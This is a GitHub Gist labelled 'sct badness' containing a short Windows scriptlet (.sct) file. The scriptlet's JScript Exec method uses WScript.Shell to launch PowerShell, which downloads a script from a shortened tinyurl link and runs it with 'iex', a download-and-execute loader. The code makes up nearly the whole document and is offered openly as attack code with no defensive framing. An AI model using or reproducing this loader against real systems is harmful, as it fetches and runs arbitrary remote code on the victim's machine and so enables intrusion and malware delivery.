Last active
June 26, 2022 02:46
-
-
Save h4sh5/de1306685104b28f882b6cb8e691fe5a to your computer and use it in GitHub Desktop.
sct badness
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <!-- SCT badness --> | |
| <public> | |
| <method name="Exec"></method> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| function Exec() | |
| { | |
| var r = new ActiveXObject("WScript.Shell").Run('powershell -c "iex (new-object net.webclient).DownloadString(\"https://tinyurl.com/ebaatuju\")'); | |
| } | |
| ]]> | |
| </script> | |
| </scriptlet> | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment